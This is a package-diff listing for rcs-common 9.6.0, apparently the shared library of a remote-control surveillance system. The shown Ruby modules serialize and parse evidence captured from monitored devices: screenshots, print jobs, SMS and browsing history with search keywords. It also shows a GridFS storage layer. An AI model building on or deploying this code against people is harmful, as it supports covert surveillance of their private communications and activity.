rcs-common 9.6.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- data/.gitignore +49 -0
- data/Gemfile +4 -0
- data/LICENSE.txt +1 -0
- data/Rakefile +27 -0
- data/lib/rcs-common.rb +21 -0
- data/lib/rcs-common/binary.rb +64 -0
- data/lib/rcs-common/cgi.rb +7 -0
- data/lib/rcs-common/component.rb +87 -0
- data/lib/rcs-common/crypt.rb +71 -0
- data/lib/rcs-common/deploy.rb +96 -0
- data/lib/rcs-common/diagnosticable.rb +136 -0
- data/lib/rcs-common/evidence.rb +261 -0
- data/lib/rcs-common/evidence/addressbook.rb +173 -0
- data/lib/rcs-common/evidence/application.rb +59 -0
- data/lib/rcs-common/evidence/calendar.rb +62 -0
- data/lib/rcs-common/evidence/call.rb +185 -0
- data/lib/rcs-common/evidence/camera.rb +25 -0
- data/lib/rcs-common/evidence/chat.rb +272 -0
- data/lib/rcs-common/evidence/clibpoard.rb +58 -0
- data/lib/rcs-common/evidence/command.rb +50 -0
- data/lib/rcs-common/evidence/common.rb +78 -0
- data/lib/rcs-common/evidence/content/camera/001.jpg +0 -0
- data/lib/rcs-common/evidence/content/coin/wallet_bit.dat +0 -0
- data/lib/rcs-common/evidence/content/coin/wallet_lite.dat +0 -0
- data/lib/rcs-common/evidence/content/file/Einstein.docx +0 -0
- data/lib/rcs-common/evidence/content/file/arabic.docx +0 -0
- data/lib/rcs-common/evidence/content/mouse/001.jpg +0 -0
- data/lib/rcs-common/evidence/content/mouse/002.jpg +0 -0
- data/lib/rcs-common/evidence/content/mouse/003.jpg +0 -0
- data/lib/rcs-common/evidence/content/mouse/004.jpg +0 -0
- data/lib/rcs-common/evidence/content/print/001.jpg +0 -0
- data/lib/rcs-common/evidence/content/screenshot/001.jpg +0 -0
- data/lib/rcs-common/evidence/content/screenshot/002.jpg +0 -0
- data/lib/rcs-common/evidence/content/screenshot/003.jpg +0 -0
- data/lib/rcs-common/evidence/content/url/001.jpg +0 -0
- data/lib/rcs-common/evidence/content/url/002.jpg +0 -0
- data/lib/rcs-common/evidence/content/url/003.jpg +0 -0
- data/lib/rcs-common/evidence/device.rb +23 -0
- data/lib/rcs-common/evidence/download.rb +54 -0
- data/lib/rcs-common/evidence/exec.rb +0 -0
- data/lib/rcs-common/evidence/file.rb +129 -0
- data/lib/rcs-common/evidence/filesystem.rb +71 -0
- data/lib/rcs-common/evidence/info.rb +24 -0
- data/lib/rcs-common/evidence/keylog.rb +84 -0
- data/lib/rcs-common/evidence/mail.rb +237 -0
- data/lib/rcs-common/evidence/mic.rb +39 -0
- data/lib/rcs-common/evidence/mms.rb +36 -0
- data/lib/rcs-common/evidence/money.rb +676 -0
- data/lib/rcs-common/evidence/mouse.rb +62 -0
- data/lib/rcs-common/evidence/password.rb +60 -0
- data/lib/rcs-common/evidence/photo.rb +80 -0
- data/lib/rcs-common/evidence/position.rb +303 -0
- data/lib/rcs-common/evidence/print.rb +50 -0
- data/lib/rcs-common/evidence/screenshot.rb +53 -0
- data/lib/rcs-common/evidence/sms.rb +91 -0
- data/lib/rcs-common/evidence/url.rb +133 -0
- data/lib/rcs-common/fixnum.rb +48 -0
- data/lib/rcs-common/gridfs.rb +294 -0
- data/lib/rcs-common/heartbeat.rb +96 -0
- data/lib/rcs-common/keywords.rb +50 -0
- data/lib/rcs-common/mime.rb +65 -0
- data/lib/rcs-common/mongoid.rb +19 -0
- data/lib/rcs-common/pascalize.rb +62 -0
- data/lib/rcs-common/path_utils.rb +67 -0
- data/lib/rcs-common/resolver.rb +40 -0
- data/lib/rcs-common/rest.rb +17 -0
- data/lib/rcs-common/sanitize.rb +42 -0
- data/lib/rcs-common/serializer.rb +404 -0
- data/lib/rcs-common/signature.rb +141 -0
- data/lib/rcs-common/stats.rb +94 -0
- data/lib/rcs-common/symbolize.rb +10 -0
- data/lib/rcs-common/systemstatus.rb +136 -0
- data/lib/rcs-common/temporary.rb +13 -0
- data/lib/rcs-common/time.rb +24 -0
- data/lib/rcs-common/trace.rb +138 -0
- data/lib/rcs-common/trace.yaml +42 -0
- data/lib/rcs-common/updater/client.rb +354 -0
- data/lib/rcs-common/updater/dsl.rb +178 -0
- data/lib/rcs-common/updater/payload.rb +79 -0
- data/lib/rcs-common/updater/server.rb +126 -0
- data/lib/rcs-common/updater/shared_key.rb +55 -0
- data/lib/rcs-common/updater/tmp_dir.rb +13 -0
- data/lib/rcs-common/utf16le.rb +83 -0
- data/lib/rcs-common/version.rb +5 -0
- data/lib/rcs-common/winfirewall.rb +235 -0
- data/rcs-common.gemspec +64 -0
- data/spec/gridfs_spec.rb +637 -0
- data/spec/mongoid.yaml +6 -0
- data/spec/signature_spec.rb +105 -0
- data/spec/spec_helper.rb +22 -0
- data/spec/updater_spec.rb +80 -0
- data/tasks/deploy.rake +21 -0
- data/tasks/protect.rake +90 -0
- data/test/helper.rb +17 -0
- data/test/test_binary.rb +107 -0
- data/test/test_cgi.rb +14 -0
- data/test/test_crypt.rb +125 -0
- data/test/test_evidence.rb +52 -0
- data/test/test_evidence_manager.rb +119 -0
- data/test/test_fixnum.rb +35 -0
- data/test/test_keywords.rb +137 -0
- data/test/test_mime.rb +49 -0
- data/test/test_pascalize.rb +100 -0
- data/test/test_path_utils.rb +24 -0
- data/test/test_rcs-common.rb +7 -0
- data/test/test_sanitize.rb +40 -0
- data/test/test_serialization.rb +20 -0
- data/test/test_stats.rb +90 -0
- data/test/test_symbolize.rb +20 -0
- data/test/test_systemstatus.rb +35 -0
- data/test/test_time.rb +56 -0
- data/test/test_trace.rb +25 -0
- data/test/test_utf16le.rb +71 -0
- data/test/test_winfirewall.rb +68 -0
- metadata +423 -0
@@ -0,0 +1,50 @@
|
|
1
|
+
require 'rcs-common/evidence/common'
|
2
|
+
|
3
|
+
module RCS

  # Mixin for PRINT evidence: the jpeg image of a printed document plus the
  # name of the print spool it came from.
  module PrintEvidence

    PRINT_VERSION = 2009031201

    # Sample payload used by the evidence generator: a fixed jpeg shipped
    # with the gem under content/print/.
    def content
      path = File.join(File.dirname(__FILE__), 'content', 'print', '001.jpg')
      File.open(path, 'rb') {|f| f.read }
    end

    def generate_content
      [ content ]
    end

    # Builds the PRINT additional header: version and spool-name length as
    # native 32-bit unsigned ints ("I*"), followed by the UTF-16LE spool name.
    def additional_header
      name = 'ASP_Common.h'.to_utf16le_binary
      header = StringIO.new
      header.write [PRINT_VERSION, name.size].pack("I*")
      header.write name

      header.string
    end

    # Inverse of #additional_header.
    # Returns {data: {spool: <utf8 spool name>}}.
    # Raises EvidenceDeserializeError on empty data or version mismatch.
    def decode_additional_header(data)
      raise EvidenceDeserializeError.new("incomplete PRINT") if data.nil? or data.bytesize == 0

      binary = StringIO.new data

      version, name_len = binary.read(8).unpack("I*")
      raise EvidenceDeserializeError.new("invalid log version for PRINT") unless version == PRINT_VERSION

      ret = Hash.new
      ret[:data] = Hash.new
      ret[:data][:spool] = binary.read(name_len).utf16le_to_utf8
      return ret
    end

    # Moves the image into grid storage and tells the caller to drop the raw
    # evidence.
    # NOTE(review): only chunks.first is kept here, while SCREENSHOT and
    # URLCAPTURE use chunks.join — confirm PRINT payloads are always a single
    # chunk.
    def decode_content(common_info, chunks)
      info = Hash[common_info]
      info[:data] ||= Hash.new
      info[:grid_content] = chunks.first
      yield info if block_given?
      :delete_raw
    end
  end

end # ::RCS
|
@@ -0,0 +1,53 @@
|
|
1
|
+
require 'rcs-common/evidence/common'
|
2
|
+
|
3
|
+
module RCS

  # Mixin for SCREENSHOT evidence: a jpeg frame plus the process name and
  # window title it was captured from.
  module ScreenshotEvidence

    SCREENSHOT_VERSION = 2009031201

    # Picks one of the three sample jpegs shipped under content/screenshot/.
    def content
      sample = format('%03d', rand(3) + 1)
      File.binread(File.join(File.dirname(__FILE__), 'content', 'screenshot', "#{sample}.jpg"))
    end

    def generate_content
      [content]
    end

    # Header layout: version, process-name length and window-name length as
    # native 32-bit unsigned ints ("I*"), followed by the two UTF-16LE strings.
    def additional_header
      proc_name = 'ruby'.to_utf16le_binary
      win_name  = 'Ruby Backdoor!'.to_utf16le_binary

      buffer = StringIO.new
      buffer.write [SCREENSHOT_VERSION, proc_name.size, win_name.size].pack("I*")
      buffer.write proc_name
      buffer.write win_name
      buffer.string
    end

    # Inverse of #additional_header.
    # Returns {data: {program: <utf8>, window: <utf8>}}.
    # Raises EvidenceDeserializeError on empty data or version mismatch.
    def decode_additional_header(data)
      raise EvidenceDeserializeError.new("incomplete SCREENSHOT") if data.nil? or data.bytesize == 0

      stream = StringIO.new(data)

      version, proc_len, win_len = stream.read(12).unpack("I*")
      raise EvidenceDeserializeError.new("invalid log version for SCREENSHOT") unless version == SCREENSHOT_VERSION

      { data: {
          program: stream.read(proc_len).utf16le_to_utf8,
          window:  stream.read(win_len).utf16le_to_utf8 } }
    end

    # Joins every chunk into grid storage and signals that the raw evidence
    # can be deleted.
    def decode_content(common_info, chunks)
      info = Hash[common_info]
      info[:data] ||= Hash.new
      info[:grid_content] = chunks.join
      yield info if block_given?
      :delete_raw
    end
  end

end # ::RCS
|
@@ -0,0 +1,91 @@
|
|
1
|
+
require_relative 'common'
|
2
|
+
require 'rcs-common/serializer'
|
3
|
+
|
4
|
+
module RCS

  # Legacy SMS evidence serialized with the MAPI serializer; kept only for
  # decoding old agents' data (content generation is unsupported).
  module SmsoldEvidence
    def content
      raise "Not implemented!"
    end

    def generate_content
      raise "Not implemented!"
    end

    # Unserializes a MAPI message out of the joined chunks.
    # NOTE(review): returns :keep_raw (raw evidence preserved), unlike
    # SmsEvidence below which deletes it — confirm this asymmetry is intended.
    def decode_content(common_info, chunks)

      info = Hash[common_info]
      info[:data] ||= Hash.new
      info[:data][:type] = :sms

      stream = StringIO.new chunks.join
      @sms = MAPISerializer.new.unserialize stream

      info[:da] = @sms.delivery_time
      # addresses carry embedded NUL bytes (wide chars): strip them
      info[:data][:from] = @sms.fields[:from].delete("\x00")
      info[:data][:rcpt] = @sms.fields[:rcpt].delete("\x00")
      info[:data][:content] = @sms.fields[:subject]
      info[:data][:incoming] = @sms.flags

      yield info if block_given?
      :keep_raw
    end
  end # ::SmsoldEvidence

  # Current SMS evidence format.
  module SmsEvidence

    SMS_VERSION = 2010050501

    def content
      "test sms".to_utf16le_binary_null
    end

    def generate_content
      [ content ]
    end

    # Header layout (all little-endian as produced by pack):
    #   int32  version
    #   int32  incoming flag (0/1)
    #   uint32 FILETIME low, uint32 FILETIME high
    #   16 bytes sender + 16 bytes recipient, NUL padded
    def additional_header
      header = StringIO.new
      header.write [SMS_VERSION].pack("l")
      header.write [[0,1].sample].pack("l") # incoming
      time = Time.now.getutc.to_filetime
      header.write time.pack('L*')
      header.write "+39123456789".ljust(16, "\x00")
      header.write "+39987654321".ljust(16, "\x00")
      header.string
    end

    # Parses the header written by #additional_header.
    # Returns {data: {incoming:, from:, rcpt:}}.
    # Raises EvidenceDeserializeError on version mismatch.
    def decode_additional_header(data)
      binary = StringIO.new data

      version = binary.read(4).unpack('l').first
      raise EvidenceDeserializeError.new("invalid log version for SMS") unless version == SMS_VERSION

      ret = Hash.new
      ret[:data] = Hash.new

      ret[:data][:incoming] = binary.read(4).unpack('l').first
      low, high = binary.read(8).unpack('L2')
      # ignore this time value, it's the same as the acquired in the common header
      # Time.from_filetime high, low
      ret[:data][:from] = binary.read(16).delete("\x00")
      ret[:data][:rcpt] = binary.read(16).delete("\x00")

      return ret
    end

    # The body is the UTF-16LE text of the message; converted to UTF-8.
    def decode_content(common_info, chunks)
      info = Hash[common_info]
      info[:data] ||= Hash.new
      info[:data][:type] = :sms

      stream = StringIO.new chunks.join

      info[:data][:content] = stream.read.utf16le_to_utf8

      yield info if block_given?
      :delete_raw
    end
  end # ::SmsEvidence

end # ::RCS
|
@@ -0,0 +1,133 @@
|
|
1
|
+
require 'rcs-common/evidence/common'

# 'cgi' must be lowercase: Kernel#require resolves feature names
# case-sensitively on case-sensitive filesystems (Linux), where
# require 'CGI' raises LoadError even though it happens to work on
# case-insensitive macOS/Windows installs.
require 'cgi'
|
4
|
+
|
5
|
+
module RCS

  # URL evidence: a visited url, the browser id, the window title and the
  # search-engine keywords extracted from the url's query string.
  module UrlEvidence

    VERSION_DELIMITER = 0x20100713
    ELEM_DELIMITER = 0xABADC0DE
    # the serialized browser id is an index into this array
    BROWSER_TYPE = ['Unknown', 'Internet Explorer', 'Firefox', 'Opera', 'Safari', 'Chrome', 'Mobile Safari', 'Browser', 'Web']

    # Extracts the search keywords from a google/yahoo/bing query string
    # (q= for google/bing, p= for yahoo). Returns '' when no recognizable
    # query is present.
    def decode_query(url)
      query = []
      query = url.scan(/(?:&?|^)q=([^&]*)(?:&|$)/).first if url['google']
      query = url.scan(/(?:&?|^)p=([^&]*)(?:&|$)/).first if url['yahoo']
      query = url.scan(/(?:&?|^)q=([^&]*)(?:&|$)/).first if url['bing']

      return CGI::unescape query.first unless query.nil? or query.empty?
      return ''
    end

    # Sample record for the evidence generator. Layout of one record:
    # 9 int32 struct-tm fields, VERSION_DELIMITER, UTF-16LE url (NUL
    # terminated), browser id, UTF-16LE window title, ELEM_DELIMITER.
    def content
      browser = [1, 2, 3, 4, 5, 6].sample
      r = rand(4)
      url = ["http://www.google.it/#hl=it&source=hp&q=pippo+baudo&aq=f&aqi=g10&aql=&oq=&gs_rfai=&fp=67a9a41ace8bb1ed", "http://reader.google.com", "https://www.facebook.com", "www.stackoverflow.com"][r].to_utf16le_binary_null
      window = ["Google Search", "Google Reader", "Facebook", "Stackoverflow"][r].to_utf16le_binary_null

      content = StringIO.new
      t = Time.now.getutc
      content.write [t.sec, t.min, t.hour, t.mday, t.mon, t.year, t.wday, t.yday, t.isdst ? 0 : 1].pack('l*')
      content.write [ VERSION_DELIMITER ].pack('L')
      content.write url
      content.write [ browser ].pack('L')
      content.write window
      content.write [ ELEM_DELIMITER ].pack('L')

      content.string
    end

    def generate_content
      ret = Array.new
      10.rand_times { ret << content() }
      ret
    end

    # Parses the joined chunks as a sequence of url records (see #content),
    # yielding one info hash per record.
    # Raises EvidenceDeserializeError on version/delimiter mismatch.
    # NOTE(review): the :delete_raw symbol sits INSIDE the until loop, so the
    # method itself returns the loop's value (nil) — confirm callers do not
    # rely on this method's return value.
    def decode_content(common_info, chunks)
      stream = StringIO.new chunks.join

      until stream.eof?
        info = Hash[common_info]
        info[:data] = Hash.new if info[:data].nil?

        # 9 int32 fields of a struct tm; trailing 0 is the utc offset
        tm = stream.read 36
        info[:da] = Time.gm(*tm.unpack('L*'), 0)
        info[:data][:url] = ''
        info[:data][:title] = ''

        delim = stream.read(4).unpack('L').first
        raise EvidenceDeserializeError.new("Malformed evidence (invalid URL version)") unless delim == VERSION_DELIMITER

        url = stream.read_utf16le_string
        info[:data][:url] = url.utf16le_to_utf8 unless url.nil?
        browser = stream.read(4).unpack('L').first
        info[:data][:program] = BROWSER_TYPE[browser]
        window = stream.read_utf16le_string
        info[:data][:title] = window.utf16le_to_utf8 unless window.nil?
        info[:data][:keywords] = decode_query info[:data][:url]

        delim = stream.read(4).unpack('L').first
        raise EvidenceDeserializeError.new("Malformed URL (missing delimiter)") unless delim == ELEM_DELIMITER

        yield info if block_given?
        :delete_raw
      end
    end

  end

  # URLCAPTURE evidence: a jpeg page snapshot plus a url/browser/title header.
  module UrlcaptureEvidence
    include UrlEvidence

    URL_VERSION = 2010071301

    # Picks one of the three sample jpegs shipped under content/url/.
    def content
      path = File.join(File.dirname(__FILE__), 'content', 'url', '00' + (rand(3) + 1).to_s + '.jpg')
      File.open(path, 'rb') {|f| f.read }
    end

    def generate_content
      [ content ]
    end

    # Header: version, browser id, url length, title length as native 32-bit
    # unsigned ints ("I*"), followed by the two UTF-16LE strings.
    def additional_header
      browser = [1, 2, 3, 4, 5, 6].sample
      r = rand(3)
      url = ['http://reader.google.com', 'https://www.facebook.com', 'http://www.stackoverflow.com'][r].to_utf16le_binary
      window = ['Google', 'Facebook', 'Stackoverflow'][r].to_utf16le_binary
      header = StringIO.new
      header.write [URL_VERSION, browser, url.size, window.size].pack("I*")
      header.write url
      header.write window

      header.string
    end

    # Inverse of #additional_header; also extracts the search keywords.
    # Raises EvidenceDeserializeError on empty data or version mismatch.
    def decode_additional_header(data)
      raise EvidenceDeserializeError.new("incomplete URLCAPTURE") if data.nil? or data.bytesize == 0

      binary = StringIO.new data

      version, browser, url_len, window_len = binary.read(16).unpack("I*")
      raise EvidenceDeserializeError.new("invalid log version for URLCAPTURE") unless version == URL_VERSION

      ret = Hash.new
      ret[:data] = Hash.new
      ret[:data][:program] = BROWSER_TYPE[browser]
      ret[:data][:url] = binary.read(url_len).utf16le_to_utf8
      ret[:data][:title] = binary.read(window_len).utf16le_to_utf8
      ret[:data][:keywords] = decode_query ret[:data][:url]
      return ret
    end

    # The snapshot image goes to grid storage; the raw payload is deleted.
    def decode_content(common_info, chunks)
      info = Hash[common_info]
      info[:data] ||= Hash.new
      info[:grid_content] = chunks.join
      yield info if block_given?
      :delete_raw
    end
  end

end # ::RCS
|
@@ -0,0 +1,48 @@
|
|
1
|
+
|
2
|
+
# Mixin that formats a numeric value as a human readable byte size.
module ByteSize

  # binary (base 2) units
  KiB = 2**10
  MiB = 2**20
  GiB = 2**30
  TiB = 2**40

  # decimal (base 10) units
  KB = 10**3
  MB = 10**6
  GB = 10**9
  TB = 10**12

  # Return the size in a human readable format.
  #
  # base - 2 for binary units (KiB, MiB, ...), 10 for decimal units (kB, MB, ...)
  #
  # Returns a String such as "1.5 KiB" or "512 B" (values are rounded to
  # 2 decimals).
  # Raises ArgumentError when base is neither 2 nor 10. (The original
  # crashed with NoMethodError on nil for any other base.)
  def to_s_bytes(base = 2)
    values = case base
             when 2  then {TiB => 'TiB', GiB => 'GiB', MiB => 'MiB', KiB => 'KiB'}
             when 10 then {TB => 'TB', GB => 'GB', MB => 'MB', KB => 'kB'}
             else raise ArgumentError, "unsupported base #{base} (use 2 or 10)"
             end

    # hashes keep insertion order, so the largest unit wins
    values.each_pair do |k, v|
      return (self.to_f / k).round(2).to_s + ' ' + v if self >= k
    end

    # case when is under KiB
    self.to_s + ' B'
  end

end

class Fixnum
  include ByteSize
end

class Float
  include ByteSize
end

# we need to add it even to Bignum for windows32 compatibility
# everything over a GiB is Bignum...
class Bignum
  include ByteSize
end
|
@@ -0,0 +1,294 @@
|
|
1
|
+
require 'digest/md5'
|
2
|
+
require 'rcs-common/mongoid'
|
3
|
+
|
4
|
+
module RCS
  module Common
    # Minimal GridFS implementation on top of Mongoid sessions
    # (supports both Mongoid 3.x/Moped and Mongoid 4+ drivers).
    module GridFS
      # Moped ships its own BSON under Mongoid 3.x; Mongoid 4+ uses the bson gem
      BSON = Moped::BSON if Mongoid::VERSION < '4.0.0'

      # Read-only, stream-like view over a stored GridFS file.
      class ReadOnlyFile
        attr_reader :attributes, :bucket, :file_position

        def initialize(bucket, attributes)
          @attributes = attributes
          @bucket = bucket
          # index of the last chunk (chunk numbering is 0-based)
          @last_chunk_num = (@attributes[:length].to_f / @attributes[:chunk_size]).ceil - 1
          rewind
        end

        # Exposes the raw file attributes (e.g. #filename, #md5) as readers.
        def method_missing(name)
          raise NoMethodError.new(name.inspect) unless @attributes.has_key?(name)
          @attributes[name]
        end

        # Reads bytes_to_read bytes from the current position (the whole
        # remainder when nil), fetching chunks lazily from the bucket.
        def read(bytes_to_read = nil)
          data = ''

          return data if @file_position >= @attributes[:length]
          return data if bytes_to_read and bytes_to_read <= 0

          # start with the unread tail of the chunk loaded by a previous read
          if @current_chunk[:n]
            chunk_size = @attributes[:chunk_size]
            offset = @file_position % chunk_size
            offset = chunk_size if offset == 0
            data = @current_chunk[:data][offset..-1] || ''
          end

          if bytes_to_read.nil? or bytes_to_read > data.bytesize
            loop do
              break unless read_next_chunk
              data << @current_chunk[:data]

              break if bytes_to_read and bytes_to_read <= data.bytesize
            end
          end

          # trim to the requested size (-1 means keep everything)
          bytes_to_read = bytes_to_read ? bytes_to_read - 1 : -1
          data = data[0..bytes_to_read]
          @file_position += data.bytesize
          data
        end

        def rewind
          @current_chunk = {n: nil, data: nil}
          @file_position = 0
        end

        def eof?
          @file_position >= @attributes[:length]
        end

        def id
          @attributes[:_id]
        end

        def file_length
          @attributes[:length]
        end

        alias :content :read
        alias :tell :file_position
        alias :position :file_position
        alias :pos :file_position

        private

        # Fetches the next chunk document from mongo. Returns nil (a falsy
        # stop signal for #read) past the last chunk or on corrupted data.
        def read_next_chunk
          chunk_num = @current_chunk[:n] ? @current_chunk[:n] + 1 : 0
          return nil if chunk_num == @last_chunk_num + 1

          chunk = bucket.chunks_collection.find(files_id: @attributes[:_id], n: chunk_num).first
          # chunk maybe nil in case of corrupted data
          # e.g.: declared length different than the actual length
          return nil unless chunk

          @current_chunk = {n: chunk['n'], data: chunk['data'].data}
        end
      end

      # A named GridFS bucket: the <name>.files / <name>.chunks pair.
      class Bucket
        attr_reader :name, :mongoid_session_name

        DEFAULT_NAME = 'fs'
        DEFAULT_CONTENT_TYPE = 'application/octet-stream'
        DEFAULT_CHUNK_SIZE = 262144
        BINARY_ENCODING = 'BINARY'

        # options:
        #   :mongoid_session_name - Mongoid session to use (default :default)
        #   :lazy - index creation is deferred to the first write unless
        #           :lazy is explicitly false (nil defaults to lazy)
        def initialize(name = DEFAULT_NAME, options = {})
          @name = name.to_s.downcase.strip
          @name = DEFAULT_NAME if @name.empty?
          @mongoid_session_name = options[:mongoid_session_name] || :default
          @setup_on_write = options[:lazy].nil? ? true : options[:lazy]
          @osx = RbConfig::CONFIG['host_os'] =~ /darwin/

          setup unless @setup_on_write
        end

        def session_options
          # Allow unsafe write on OSX.
          # @see https://github.com/mongoid/mongoid/issues/3582
          @osx ? {safe: false} : {}
        end

        def session
          Mongoid.session(mongoid_session_name).with(session_options)
        end

        def files_collection
          session[:"#{name}.files"]
        end

        def chunks_collection
          session[:"#{name}.chunks"]
        end

        # Stores content and returns the new file id.
        # Returns nil for nil or empty content.
        # attrs may carry :filename, :content_type, :aliases, :metadata,
        # :upload_date (camelCase variants accepted).
        def put(content, attrs = {}, options = {})
          return if content.nil?

          file = {}

          file[:_id] = BSON::ObjectId.new
          file[:length] = content.bytesize
          file[:chunkSize] = DEFAULT_CHUNK_SIZE

          return if file[:length].zero?

          file[:filename] = attrs[:filename]
          file[:contentType] = attrs[:content_type] || attrs[:contentType] || DEFAULT_CONTENT_TYPE
          file[:aliases] = attrs[:aliases] || []
          file[:aliases] = [file[:aliases]].flatten
          file[:metadata] = attrs[:metadata] || {}
          file[:metadata] = {} if file[:metadata].blank?
          file[:uploadDate] = attrs[:upload_date] || attrs[:uploadDate] || Time.now.utc

          # write the chunks first; #write returns the streaming md5
          file[:md5] = write(file[:_id], content, options)

          files_collection.insert(file)

          file[:_id]
        end

        # Server-side md5 of a stored file (mongodb "filemd5" command).
        def md5(file_id)
          doc = session.command(filemd5: file_id, root: name)
          doc['md5'] if doc.respond_to?(:[])
        end

        # Appends data to an existing file, looked up by id (or by filename
        # when options[:filename] is truthy). When the file is missing and
        # options[:create] is given, the file is created instead.
        # Returns [file_id, new_length]. Raises when the file is not found.
        def append(file_id, data, options = {})
          attributes = if options[:filename]
            files_collection.find(filename: file_id).first
          else
            file_id = objectid(file_id)
            files_collection.find(_id: file_id).first
          end

          if !attributes and options[:create]
            file_attributes = options[:create].respond_to?(:[]) ? options[:create] : {}
            new_file_id = put(data, file_attributes, options)
            return [new_file_id, data.bytesize]
          end

          raise("File not found: #{file_id}") unless attributes

          attributes = attributes.to_h.symbolize_keys

          file_id = objectid(attributes[:_id])

          length, chunk_size = attributes[:length], attributes[:chunkSize]

          chunk_offset = (length / chunk_size).to_i
          offset = length % chunk_size

          # the last chunk is partial: prepend it to data so it gets rewritten
          if offset > 0
            data = chunks_collection.find(files_id: file_id, n: chunk_offset).first['data'].data + data
          end

          chunkerize(data) do |chunk_data, chunk_num|
            chunks_collection.find(files_id: file_id, n: chunk_num + chunk_offset).upsert('$set' => {data: binary(chunk_data)})
          end

          new_md5 = md5(file_id) if options[:md5] != false
          new_length = length - offset + data.bytesize

          files_collection.find(_id: file_id).update('$set' => {length: new_length, md5: new_md5})

          [file_id, new_length]
        end

        # Equivalent to #get(id).read
        def content(file_id)
          file_id = objectid(file_id)

          chunks_collection.find(files_id: file_id, n: {'$gte' => 0}).inject("") do |data, chunk|
            data << chunk['data'].data
          end
        end

        # Returns a ReadOnlyFile for file_id, or nil when not found.
        def get(file_id, options = {})
          file_id = objectid(file_id)
          attributes = files_collection.find(_id: file_id).first

          return unless attributes

          attributes = attributes.to_h.symbolize_keys
          attributes[:bucket] = self
          # snake_case aliases for the canonical gridfs attribute names
          attributes[:chunk_size] = attributes[:chunkSize]
          attributes[:content_type] = attributes[:contentType]
          attributes[:upload_date] = attributes[:uploadDate]

          ReadOnlyFile.new(self, attributes)
        end

        # Removes the file document and all of its chunks. Returns nil.
        def delete(file_id)
          file_id = objectid(file_id)

          files_collection.find(_id: file_id).remove
          chunks_collection.find(files_id: file_id).remove_all

          return nil
        end

        # Drops both collections; indexes will be recreated on the next write.
        def drop
          [files_collection, chunks_collection].map(&:drop)
          @setup_on_write = true
        end

        alias :remove :delete

        private

        # Accepts a BSON::ObjectId (anything responding to #generation_time)
        # or any value whose #to_s is a valid object id string.
        def objectid(id)
          id.respond_to?(:generation_time) ? id : BSON::ObjectId.from_string(id.to_s)
        end

        # Creates the gridfs indexes. Returns nil.
        def setup
          chunks_collection.indexes.create({files_id: 1, n: 1}, {unique: true})
          # This is an optional index (not required by the gridfs specs)
          files_collection.indexes.create({filename: 1}, {background: true})
          nil
        end

        # Yields (chunk_data, chunk_num) slices of at most DEFAULT_CHUNK_SIZE
        # bytes until data is exhausted.
        def chunkerize(data)
          offset = 0
          chunk_num = 0

          loop do
            chunk_data = data.byteslice(offset..(offset + DEFAULT_CHUNK_SIZE - 1))
            break if chunk_data.nil?
            chunk_data_size = chunk_data.bytesize
            offset += chunk_data_size
            break if chunk_data_size == 0
            yield(chunk_data, chunk_num)
            break if chunk_data_size < DEFAULT_CHUNK_SIZE
            chunk_num += 1
          end
        end

        # Streams data into the chunks collection. Returns the md5 hexdigest
        # of the data, or nil when options[:md5] == false.
        def write(file_id, data, options = {})
          # setup returns nil, so this also clears the lazy-setup flag
          @setup_on_write = setup if @setup_on_write

          md5 = Digest::MD5.new if options[:md5] != false

          chunkerize(data) do |chunk_data, chunk_num|
            chunks_collection.insert(files_id: file_id, n: chunk_num, data: binary(chunk_data))
            md5.update(chunk_data) if md5
          end

          md5.hexdigest if md5
        end

        # BSON::Binary's constructor argument order differs between the Moped
        # BSON (subtype first) and the bson gem (data first).
        if Mongoid::VERSION < '4.0.0'
          def binary(data)
            data.force_encoding(BINARY_ENCODING) if data.respond_to?(:force_encoding)
            BSON::Binary.new(:generic, data)
          end
        else
          def binary(data)
            data.force_encoding(BINARY_ENCODING) if data.respond_to?(:force_encoding)
            BSON::Binary.new(data, :generic)
          end
        end
      end
    end
  end
end
|